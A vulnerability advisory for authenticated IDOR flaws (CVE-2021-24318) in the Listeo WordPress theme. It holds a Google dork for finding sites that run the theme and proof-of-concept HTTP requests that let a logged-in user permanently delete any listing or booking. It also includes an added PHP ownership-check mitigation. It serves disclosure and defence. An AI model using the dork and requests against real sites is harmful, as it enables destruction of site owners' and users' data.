/*!
- # VULNERABILITY: Listeo WordPress Theme <= 1.6.10 - Multiple Authenticated IDOR Vulnerabilities
- # GOOGLE DORK: inurl:/wp-content/themes/listeo/
- # DATE: 2021-02-10
- # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ]
- # VENDOR: Purethemes [ https://purethemes.net ]
- # SOFTWARE VERSION: <= 1.6.10
- # SOFTWARE LINK: https://themeforest.net/item/listeo-directory-listings-wordpress-theme/23239259
- # CVSS: Multiple
- # CWE: CWE-639
- # CVE: CVE-2021-24318
*/
### -- [ Info: ]
[i] Multiple authenticated IDOR vulnerabilities were discovered in the Listeo theme through v1.6.10 for WordPress.
[i] Plugin(s) affected: Listeo Core by Purethemes [ https://purethemes.net ].
### -- [ Vulnerabilities: ]
[x] Authenticated IDOR | Post/page deletion: /my-properties/?action=delete&property_id=&_wpnonce=.
[x] Authenticated IDOR | Booking deletion: action=listeo_bookings_manage&booking_id=&status=deleted.
### -- [ Impact: ]
[~] An authenticated user can remove any content from the targeted website, up to and including erasing all of its content.
### -- [ CVSS 3.1: ]
[%] Authenticated IDOR | Post/page deletion: AV:N/AC:L/PR:L/UI:R/S:U
[%] Authenticated IDOR | Booking deletion: AV:N/AC:L/PR:L/UI:R/S:U
### -- [ PoC #1 | Authenticated IDOR | Permanent post/page deletion: ]
[!] https://listeo.pro/my-listings/?status=pending&action=delete&listing_id=13&_wpnonce=88a432b100
[!] GET /my-listings/?action=delete&listing_id=13&_wpnonce=88a432b100 HTTP/1.1
Host: listeo.pro
Cookie: [user cookies]
### -- [ PoC #2 | Authenticated IDOR | Permanent booking deletion: ]
[!] POST /wp-admin/admin-ajax.php HTTP/1.1
Host: listeo.pro
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Cookie: [user cookies]

action=listeo_bookings_manage&booking_id=13&status=deleted
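### -- [ Mitigation example (added): ]
[i] Added example, not Listeo Core's code and not part of the original advisory: a WordPress AJAX handler that applies the object-level ownership check whose absence is CWE-639. The action name `example_bookings_manage`, the nonce action, the table `example_bookings` and its columns `id`, `guest_id` and `owner_id` are assumptions.

```php
<?php
// Added example, hypothetical handler: NOT Listeo Core's code. The action name, nonce
// action, table and column names (id, guest_id, owner_id) are assumptions.

// Object-level authorization: may $user_id change the state of this booking?
function example_can_manage_booking( $booking, $user_id, $is_admin ) {
    if ( ! $booking || $user_id <= 0 ) {
        return false; // unknown booking or anonymous caller
    }
    if ( $is_admin ) {
        return true;
    }
    // Compare against the owner stored in the database, never a request parameter.
    return (int) $booking->guest_id === $user_id
        || (int) $booking->owner_id === $user_id;
}

function example_bookings_manage() {
    global $wpdb;
    // CSRF check only: a valid nonce does not prove the caller owns the object.
    check_ajax_referer( 'example_bookings_manage', '_wpnonce' );

    $booking_id = isset( $_POST['booking_id'] ) ? absint( $_POST['booking_id'] ) : 0;
    $status     = isset( $_POST['status'] ) ? sanitize_key( $_POST['status'] ) : '';
    $table      = $wpdb->prefix . 'example_bookings'; // assumed table name

    $booking = $wpdb->get_row(
        $wpdb->prepare( "SELECT * FROM {$table} WHERE id = %d", $booking_id )
    );

    $is_admin = current_user_can( 'manage_options' );
    if ( ! example_can_manage_booking( $booking, get_current_user_id(), $is_admin ) ) {
        wp_send_json_error( array( 'message' => 'Forbidden' ), 403 ); // sends JSON and exits
    }

    if ( 'deleted' === $status ) {
        $wpdb->delete( $table, array( 'id' => $booking_id ), array( '%d' ) );
    }
    wp_send_json_success();
}
// wp_ajax_{action} only requires a logged-in user; login alone is not authorization.
add_action( 'wp_ajax_example_bookings_manage', 'example_bookings_manage' );
```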
### -- [ Contacts: ]
[+] Website: m0ze.ru
[+] GitHub: @m0ze
[+] Telegram: @m0ze_ru
[+] Twitter: @vladm0ze